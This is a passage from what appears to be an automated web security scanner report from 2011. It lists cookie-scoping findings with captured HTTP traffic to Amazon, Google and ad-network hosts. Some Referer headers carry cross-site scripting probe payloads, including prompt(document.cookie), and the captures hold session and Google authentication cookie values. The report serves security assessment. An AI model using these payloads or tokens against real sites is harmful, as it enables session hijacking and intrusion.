Cache-Control: no-cache, private
P3P: "policyref="/w3c/p3p.xml", CP="NOI DSP NID OUR STP""
Set-Cookie: DotomiUser=230600846273249123$0$2065492370; Domain=.dotomi.com; Expires=Tue, 03-Sep-2013 14:58:02 GMT; Path=/
Set-Cookie: DotomiSession_2399=2_273300890137713469$230600846273249123$2065492370$1315148282514; Domain=.dotomi.com; Path=/
Set-Cookie: DotomiNet=2$DjQqblZ1R3FBBWdeBwJ9XghHKDNEGQNECVltVlFLYHxnfAoMBQ9AVxZYERtFSlUCJiZWfWliVH5AeEoNYlsKA28BQgBweQRiUgRNUGBDBwEgEGR8AAEICEBeBAJWR0hCQ1tlY08oOycGGRA5AmtmXgQAdl0%3D; Domain=.dotomi.com; Expires=Tue, 03-Sep-2013 14:58:02 GMT; Path=/
Set-Cookie: DotomiRR2399=-1$3$0$; Domain=.dotomi.com; Expires=Mon, 05-Sep-2011 14:58:02 GMT; Path=/
Content-Type: text/html
Content-Length: 1535

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<meta http-equiv="Content-Type" content="text/html;charset=UTF-8">
</head>

<body>
<script language="JavaScript" typ
...[SNIP]...

9.4. http://www.amazon.com/s/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.amazon.com
Path:	/s/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
session-id=185-1916103-3839538; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
ubid-main=186-9518835-6308315; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT

The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /s/ HTTP/1.1
Host: www.amazon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 MovedTemporarily
Date: Sun, 04 Sep 2011 14:05:57 GMT
Server: Server
x-amz-id-1: 1MCWFT86A4TFVNJ9NN6T
p3p: policyref="http://www.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
x-amz-id-2: 50sQtUrR3qrXoBfJJsSGyBfu1uG6OU3IWoNAxDb1cJ76OkjRiU2BYQ8ioWz3dTGZ
Location: http://www.amazon.com/ref=nb_sb_noss_null
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=ISO-8859-1
Set-cookie: ubid-main=186-9518835-6308315; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: session-id=185-1916103-3839538; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Content-Length: 1

9.5. http://a.tribalfusion.com/i.cid previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/i.cid

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ANON_ID=OptOut; path=/; domain=.tribalfusion.com; expires=Wed, 01-Sep-2021 12:18:54 GMT;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /i.cid?c=413473&d=30&page=landingPage HTTP/1.1
Host: a.tribalfusion.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/?domain=kapersky.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ANON_ID=OptOut

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 206
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=OptOut; path=/; domain=.tribalfusion.com; expires=Wed, 01-Sep-2021 12:18:54 GMT;
Content-Type: text/html
Location: /z/i.cid?c=413473&d=30&page=landingPage
Content-Length: 36
Connection: keep-alive

<h1>Error 302 Moved Temporarily</h1>

9.6. http://a.tribalfusion.com/z/i.cid previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/z/i.cid

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ANON_ID=ahnrXhm5abxmyuoKUgEQvvkBQJtx1GtCIWCHvZamdhCZbUrvYE571SqfjBjBKyMs4dQ0dG500G; path=/; domain=.tribalfusion.com; expires=Sat, 03-Dec-2011 12:19:22 GMT;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /z/i.cid?c=413473&d=30&page=landingPage HTTP/1.1
Host: a.tribalfusion.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/?domain=kapersky.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ANON_ID=OptOut

Response

HTTP/1.1 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 307
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=ahnrXhm5abxmyuoKUgEQvvkBQJtx1GtCIWCHvZamdhCZbUrvYE571SqfjBjBKyMs4dQ0dG500G; path=/; domain=.tribalfusion.com; expires=Sat, 03-Dec-2011 12:19:22 GMT;
Content-Type: image/gif
Content-Length: 43
Connection: keep-alive

GIF89a.............!.......,........@..D..;

9.7. http://action.media6degrees.com/orbserv/hbpix previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://action.media6degrees.com
Path:	/orbserv/hbpix

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

vstcnt=41al010r06458kv131p20220324e2od118e10624fj9y118e10q24t3e9118e10a23sti11hj10224mij2127p2062072; Domain=media6degrees.com; Expires=Fri, 02-Mar-2012 12:27:22 GMT; Path=/
clid=2lpgndm01170gl99ih0j0xqn1jck001c6v021102902; Domain=media6degrees.com; Expires=Fri, 02-Mar-2012 12:27:22 GMT; Path=/
sglst=41an0ai1020ag29x000th9x0094r0e044m9x008nc9x00dng9b106oo9x006op9b107239x00h939x00g0s9b10ebc9x00g0t9x000kn9x009rs9x00bo09x008219x004ry0609rr9b107249b10cwg9b10box9b10bny9b10fyt9b1; Domain=media6degrees.com; Expires=Fri, 02-Mar-2012 12:27:22 GMT; Path=/
rdrlst=40r1210lptjcn0000000g6v0213j3lpl77b000000126v02159ilpl77b000000126v021ax5lq7dnr000000046v021ax7lqt5nu000000036v020jv8lptjcn0000000g6v02163klptjcn0000000g6v021cxnlqt5nu000000036v020lw4lqt5nu000000036v0217gylqt5nu000000036v020znmlpl77b000000126v020p43lptjcn0000000g6v021203lq7dnr000000046v020caflpl77b000000126v021201lptjcn0000000g6v0200c5lpl77b000000126v020p46lptjcn0000000g6v021ar1lptjcn0000000g6v020h4hlq7dnr000000046v02196mlpl60r000000176v020h4glptjcn0000000g6v0215xylpl77b000000126v0207sylqt5nu000000036v0210polpl60i000000186v020hv1lptjcn0000000g6v020hv0lqt5nu000000036v0214p7lptjcn0000000g6v02; Domain=media6degrees.com; Expires=Fri, 02-Mar-2012 12:27:22 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /orbserv/hbpix?pixId=5692&pcv=58 HTTP/1.1
Host: action.media6degrees.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/?domain=kapersky.com&d6626%22%3E%3Cscript%3Eprompt(%22E-Mail%22)%3C/script%3Eccf8d1d548d=1
Cookie: clid=2lpgndm01170gl99ih0j0xqn1jcik01b6v011101901; ipinfo=2lqzzw60zijasq5yhbqbe90httd3GK520752HF6QnyynflFbsgYnlreGrpuabybtvrf00; acs=016020a0e0f0g0h1lpgndmxzt11cia8xzt11cia8xzt11cia8xzt11cia8xzt11cia8; rdrlst=40r1210lptjcn0000000f6v0113j3lpl77b000000116v011ax5lq7dnr000000036v01159ilpl77b000000116v011ax7lqt5nu000000026v010jv8lptjcn0000000f6v01163klptjcn0000000f6v011cxnlqt5nu000000026v010lw4lqt5nu000000026v0117gylqt5nu000000026v010p43lptjcn0000000f6v010znmlpl77b000000116v011203lq7dnr000000036v010caflpl77b000000116v011201lptjcn0000000f6v0100c5lpl77b000000116v010p46lptjcn0000000f6v011ar1lptjcn0000000f6v010h4hlq7dnr000000036v01196mlpl60r000000166v010h4glptjcn0000000f6v0115xylpl77b000000116v0107sylqt5nu000000026v0110polpl60i000000176v010hv1lptjcn0000000f6v0114p7lptjcn0000000f6v010hv0lqt5nu000000026v01; sglst=41an0ai0020ag29xe00th9x2094r0e044m9x208nc9x20dng9b106oo9x206op9b107239x20h939x20g0s9b10ebc9x20g0t9x200kn9x209rs9x20bo09x208219x204ry0609rr9b107249b10cwg9b10box9b10bny9b10fyt9b1; vstcnt=41al010r06458kv131p20220324e2od118e10624fj9y118e10q24t3e9118e10a23sti11hj10224mij2127p2062072
Cache-Control: max-age=0

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: CP="COM NAV INT STA NID OUR IND NOI"
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: vstcnt=41al010r06458kv131p20220324e2od118e10624fj9y118e10q24t3e9118e10a23sti11hj10224mij2127p2062072; Domain=media6degrees.com; Expires=Fri, 02-Mar-2012 12:27:22 GMT; Path=/
Set-Cookie: clid=2lpgndm01170gl99ih0j0xqn1jck001c6v021102902; Domain=media6degrees.com; Expires=Fri, 02-Mar-2012 12:27:22 GMT; Path=/
Set-Cookie: sglst=41an0ai1020ag29x000th9x0094r0e044m9x008nc9x00dng9b106oo9x006op9b107239x00h939x00g0s9b10ebc9x00g0t9x000kn9x009rs9x00bo09x008219x004ry0609rr9b107249b10cwg9b10box9b10bny9b10fyt9b1; Domain=media6degrees.com; Expires=Fri, 02-Mar-2012 12:27:22 GMT; Path=/
Set-Cookie: rdrlst=40r1210lptjcn0000000g6v0213j3lpl77b000000126v02159ilpl77b000000126v021ax5lq7dnr000000046v021ax7lqt5nu000000036v020jv8lptjcn0000000g6v02163klptjcn0000000g6v021cxnlqt5nu000000036v020lw4lqt5nu000000036v0217gylqt5nu000000036v020znmlpl77b000000126v020p43lptjcn0000000g6v021203lq7dnr000000046v020caflpl77b000000126v021201lptjcn0000000g6v0200c5lpl77b000000126v020p46lptjcn0000000g6v021ar1lptjcn0000000g6v020h4hlq7dnr000000046v02196mlpl60r000000176v020h4glptjcn0000000g6v0215xylpl77b000000126v0207sylqt5nu000000036v0210polpl60i000000186v020hv1lptjcn0000000g6v020hv0lqt5nu000000036v0214p7lptjcn0000000g6v02; Domain=media6degrees.com; Expires=Fri, 02-Mar-2012 12:27:22 GMT; Path=/
Location: http://ad.yieldmanager.com/pixel?t=2&id=1289561&id=1146792
Content-Length: 0
Date: Sun, 04 Sep 2011 12:27:21 GMT
Connection: close

9.8. http://ads.pointroll.com/PortalServe/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.pointroll.com
Path:	/PortalServe/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

PRgo=BBBAAsJvBBVBF4FR;domain=.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /PortalServe/?pid=1360197W60220110720201540&flash=10&time=0|9:14|-5&redir=http://adclick.g.doubleclick.net/aclk%3Fsa%3DL%26ai%3DBRr5MnodjTqmsIYHyjAT7k9CZAsagjuMClpzB0TG2yYHPfwAQARgBIL7O5Q04AFD-h9aS-f____8BYMnW-obIo6AZugEJNzI4eDkwX2FzyAEJ2gGWAWZpbGU6Ly8vRDovY2RuLzIwMTEvMDkvMDQvZ2hkYi9kb3JrLXJlZmxlY3RlZC14c3MtY3Jvc3Mtc2l0ZS1zY3JpcHRpbmctY3dlNzktY2FwZWM4Ni1qYXZhc2NyaXB0LWluamVjdGlvbi1leGFtcGxlLXBvYy1yZXBvcnQtc3RvcmVkaWdpdGFscml2ZXJjb20uaHRtbJgC-gG4AhjAAgbIAu712ySoAwHoA6gG6APdBfUDAgAAxKAGEQ%26num%3D1%26sig%3DAOD64_0LWfxq5dnWNkTLINvN8Jq7FKlUcQ%26client%3Dca-pub-4063878933780912%26adurl%3D$CTURL$&r=0.838781330967322 HTTP/1.1
Host: ads.pointroll.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1315163667&flash=10.3.183&url=file%3A%2F%2F%2FD%3A%2Fcdn%2F2011%2F09%2F04%2Fghdb%2Fdork-reflected-xss-cross-site-scripting-cwe79-capec86-javascript-injection-example-poc-report-storedigitalrivercom.html&dt=1315145667732&bpp=3&shv=r20110824&jsv=r20110719&correlator=1315145667845&frm=4&adk=1607234649&ga_vid=1465475066.1315145668&ga_sid=1315145668&ga_hid=849475373&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=20&u_nmime=100&dff=times%20new%20roman&dfs=16&adx=8&ady=284&biw=1033&bih=894&eid=36887102&fu=0&ifi=1&dtd=245&xpc=QlLdMrIDQr&p=file%3A//
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

9.9. https://adwords.google.com/um/StartNewLogin previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://adwords.google.com
Path:	/um/StartNewLogin

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

S=photos_html=P6Bw9eJf2CgEgrvPvA9HEQ:adwords-usermgmt=8m8diCZnA629VzN_ZVvlPg; Domain=.google.com; Path=/; Secure; HttpOnly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /um/StartNewLogin HTTP/1.1
Host: adwords.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

9.10. http://amch.questionmarket.com/adsc/d921286/4/931683/adscout.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://amch.questionmarket.com
Path:	/adsc/d921286/4/931683/adscout.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

CS1=deleted; expires=Sat, 04 Sep 2010 12:16:20 GMT; path=/; domain=.questionmarket.com
CS1=931683-4-2; expires=Thu, 25 Oct 2012 04:16:21 GMT; path=/; domain=.questionmarket.com
ES=921286-wME{M-$1; expires=Thu, 25-Oct-2012 04:16:21 GMT; path=/; domain=.questionmarket.com;

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adsc/d921286/4/931683/adscout.php?ord=667294 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://blogs.computerworld.com/18810/happy_hackers_attack_sites_submit_hacks_for_ratings_on_rankmyhack
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 12:16:21 GMT
Server: Apache/2.2.3
X-Powered-By: PHP/4.4.4
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
DL_S: b102.dl
Set-Cookie: CS1=deleted; expires=Sat, 04 Sep 2010 12:16:20 GMT; path=/; domain=.questionmarket.com
Set-Cookie: CS1=931683-4-2; expires=Thu, 25 Oct 2012 04:16:21 GMT; path=/; domain=.questionmarket.com
Set-Cookie: ES=921286-wME{M-$1; expires=Thu, 25-Oct-2012 04:16:21 GMT; path=/; domain=.questionmarket.com;
Cache-Control: post-check=0, pre-check=0
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,...........D..;

9.11. http://amch.questionmarket.com/adscgen/dynamiclink.js.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://amch.questionmarket.com
Path:	/adscgen/dynamiclink.js.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

LP=1315138623; expires=Thu, 08 Sep 2011 16:17:03 GMT; path=/; domain=.questionmarket.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /adscgen/dynamiclink.js.php?sub=amch&type=d_layer&survey_num=920737&lang=&from_node=29569&site=2 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://searchsecurity.techtarget.com/tip/Addressing-the-dangers-of-JavaScript-in-the-enterprise
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CS1=931683-4-1; ES=921286-wME{M-0; linkjumptest=1

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 12:17:03 GMT
Server: Apache/2.2.3
X-Powered-By: PHP/4.4.4
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
DL_S: b103.dl
Set-Cookie: LP=1315138623; expires=Thu, 08 Sep 2011 16:17:03 GMT; path=/; domain=.questionmarket.com
Content-Length: 2444
Content-Type: text/html

(function(){
var d=document,w=window,dle;

function ff(){
var p=w.parent,r;

while (p != top) {
try {
if (p.location.host == w.location.host)
r = p.document.referrer;
} catch (e) { }

p = p.paren
...[SNIP]...

9.12. http://apis.google.com/js/plusone.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://apis.google.com
Path:	/js/plusone.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

SID=DQAAAO8AAAAdw-kaWu-Fwov6yR3LF5btMP1jnbGP3lA1M5cAk-0Wck2mlABMlKMllxla9PLwToQ6Dzrhz-v1Lq7PQ2o3ThUVIxuB7SVIVJjmSOGo3UpjxZ2Ms-siayi9e5mR3fQNgCwvNMI1ZR5pi86UDX3RjSEUkvGudz_HwxzWhdkifKTb2Pueggnt_R-Wq4cYX1myqtEWIr4ingATgva_JfCprkupgYOaut-TyOgZMu3abzangqdXu7C23wrZk52zsQqyvN8cgmKEcYqsYLb7POsFQ_k_vJG6IgdGLAd92mNx9HVO7YYTbQzVbwOwFdQcMZ4kaGg;Domain=.google.com;Path=/;Expires=Wed, 01-Sep-2021 14:46:27 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/plusone.js HTTP/1.1
Host: apis.google.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.networkworld.com/?ba876%27-prompt(document.cookie)-%276d0de08921e=1
Cookie: PREF=ID=6140ef94871a2db0:U=9d75f5fa4bcb248c:TM=1310133151:LM=1312213620:S=1dVXBMrxVgTaM0LN; NID=50=RiW-T5rw6UNHE15U6e4ijurLlYQOhNAAx3AsgOlhf7JoXYr8k9p6zhr8BmRYYCm9S9iqhE9q7qPrM1SddgaXFMnn_WCOi1yRRQBODECSO7QxI_jJn0Wa1bbVacK0-r5F; SID=DQAAAO4AAAAdw-kaWu-Fwov6yR3LF5btJQKyXt26WvTbnbCHhbYGMUYslj9E0rmryFbIBh0mNioAy36AVJr0wxxbTdG_AR-DUvLpve_N0D22ps8-7DTanIxa5Rc4x8xctp7gvjfbh8JgQYv0wLaZuPAeVNCaBVyNrTCSOHVTn6TwSi5sW1GcsImZ8XGMv6f_OxVfEetZG7heu6lY_dDHOC4ayDe2k--6ny0-6-aaM2dgO4wzoO46jQRBran2agON5wVjNp4Hm9zv-oEFn3x4k83KCLfow4_wEr_GeIqUWO5qSgyq-jZ547I1lnX4JduC5DBaH-iZYxY; HSID=ASQKbekgY7NOzCbjB; APISID=yDIrlyJyOEC5lWwI/AaFthBiKWYI1xFYHH

Response

HTTP/1.1 200 OK
Set-Cookie: SID=DQAAAO8AAAAdw-kaWu-Fwov6yR3LF5btMP1jnbGP3lA1M5cAk-0Wck2mlABMlKMllxla9PLwToQ6Dzrhz-v1Lq7PQ2o3ThUVIxuB7SVIVJjmSOGo3UpjxZ2Ms-siayi9e5mR3fQNgCwvNMI1ZR5pi86UDX3RjSEUkvGudz_HwxzWhdkifKTb2Pueggnt_R-Wq4cYX1myqtEWIr4ingATgva_JfCprkupgYOaut-TyOgZMu3abzangqdXu7C23wrZk52zsQqyvN8cgmKEcYqsYLb7POsFQ_k_vJG6IgdGLAd92mNx9HVO7YYTbQzVbwOwFdQcMZ4kaGg;Domain=.google.com;Path=/;Expires=Wed, 01-Sep-2021 14:46:27 GMT
Content-Type: text/javascript; charset=utf-8
P3P: CP="This is not a P3P policy! See http://www.google.com/support/accounts/bin/answer.py?hl=en&answer=151657 for more info."
Expires: Sun, 04 Sep 2011 14:46:27 GMT
Date: Sun, 04 Sep 2011 14:46:27 GMT
Cache-Control: private, max-age=3600
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Content-Length: 5476

window.___jsl=window.___jsl||{};
window.___jsl.h=window.___jsl.h||'r;gc\/23579912-2b1b2e17';
window.___jsl.l=[];
window.__GOOGLEAPIS=window.__GOOGLEAPIS||{};
window.__GOOGLEAPIS.gwidget=window.__GOOGL
...[SNIP]...

9.13. http://ar.voicefive.com/b/recruitBeacon.pli previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ar.voicefive.com
Path:	/b/recruitBeacon.pli

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

BMX_BR=pid=p81479006&prad=58778952&arc=40380395&exp=1315138437; expires=Mon 05-Sep-2011 12:13:57 GMT; path=/; domain=.voicefive.com;
ar_p81479006=exp=1&initExp=Sun Sep 4 12:13:57 2011&recExp=Sun Sep 4 12:13:57 2011&prad=58778952&rn=6216791&arc=40380395&; expires=Sat 03-Dec-2011 12:13:57 GMT; path=/; domain=.voicefive.com;

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /b/recruitBeacon.pli?pid=p81479006&PRAd=58778952&AR_C=40380395&rn=6216791 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://blogs.computerworld.com/18810/happy_hackers_attack_sites_submit_hacks_for_ratings_on_rankmyhack
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p90175839=exp=1&initExp=Thu Sep 1 00:18:01 2011&recExp=Thu Sep 1 00:18:01 2011&prad=3992133314369593&arc=6108751&; BMX_3PC=1; BMX_BR=pid=p82806590&prad=67008629&arc=40380915&exp=1315138417; ar_p82806590=exp=2&initExp=Sun Sep 4 12:13:34 2011&recExp=Sun Sep 4 12:13:37 2011&prad=67008629&arc=40380915&; UID=9cc29993-80.67.74.150-1314836282; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1315138425%2E221%2Cwait%2D%3E10000%2C

Response

HTTP/1.1 302 Redirect
Server: nginx
Date: Sun, 04 Sep 2011 12:13:57 GMT
Content-Type: text/plain
Connection: close
Set-Cookie: BMX_BR=pid=p81479006&prad=58778952&arc=40380395&exp=1315138437; expires=Mon 05-Sep-2011 12:13:57 GMT; path=/; domain=.voicefive.com;
Set-Cookie: ar_p81479006=exp=1&initExp=Sun Sep 4 12:13:57 2011&recExp=Sun Sep 4 12:13:57 2011&prad=58778952&rn=6216791&arc=40380395&; expires=Sat 03-Dec-2011 12:13:57 GMT; path=/; domain=.voicefive.com;
Location: http://b.voicefive.com/p?c1=4&c2=p81479006&c3=58778952&c4=40380395&c5=&c6=1&c7=Sun%20Sep%20%204%2012%3A13%3A57%202011&c8=&c9=&c10=&c15=&rn=1315138437
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent
Content-Length: 0

9.14. http://ar.voicefive.com/b/recruitBeacon.pli previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ar.voicefive.com
Path:	/b/recruitBeacon.pli

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

BMX_BR=pid=p82806590&prad=67008629&arc=40380915&exp=1315138417; expires=Mon 05-Sep-2011 12:13:37 GMT; path=/; domain=.voicefive.com;
ar_p82806590=exp=2&initExp=Sun Sep 4 12:13:34 2011&recExp=Sun Sep 4 12:13:37 2011&prad=67008629&arc=40380915&; expires=Sat 03-Dec-2011 12:13:37 GMT; path=/; domain=.voicefive.com;

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /b/recruitBeacon.pli?pid=p82806590&PRAd=67008629&AR_C=40380915 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://searchsecurity.techtarget.com/tip/Addressing-the-dangers-of-JavaScript-in-the-enterprise
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p90175839=exp=1&initExp=Thu Sep 1 00:18:01 2011&recExp=Thu Sep 1 00:18:01 2011&prad=3992133314369593&arc=6108751&; ar_p82806590=exp=1&initExp=Sun Sep 4 12:13:34 2011&recExp=Sun Sep 4 12:13:34 2011&prad=67008633&arc=43678446&; BMX_G=method->-1,ts->1315138414; BMX_3PC=1; UID=9cc29993-80.67.74.150-1314836282

Response

HTTP/1.1 302 Redirect
Server: nginx
Date: Sun, 04 Sep 2011 12:13:37 GMT
Content-Type: text/plain
Connection: close
Set-Cookie: BMX_BR=pid=p82806590&prad=67008629&arc=40380915&exp=1315138417; expires=Mon 05-Sep-2011 12:13:37 GMT; path=/; domain=.voicefive.com;
Set-Cookie: ar_p82806590=exp=2&initExp=Sun Sep 4 12:13:34 2011&recExp=Sun Sep 4 12:13:37 2011&prad=67008629&arc=40380915&; expires=Sat 03-Dec-2011 12:13:37 GMT; path=/; domain=.voicefive.com;
Location: http://b.voicefive.com/p?c1=4&c2=p82806590&c3=67008629&c4=40380915&c5=&c6=2&c7=Sun%20Sep%20%204%2012%3A13%3A34%202011&c8=&c9=&c10=&c15=&rn=1315138417
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent
Content-Length: 0

9.15. http://ar.voicefive.com/b/recruitBeacon.pli previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ar.voicefive.com
Path:	/b/recruitBeacon.pli

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

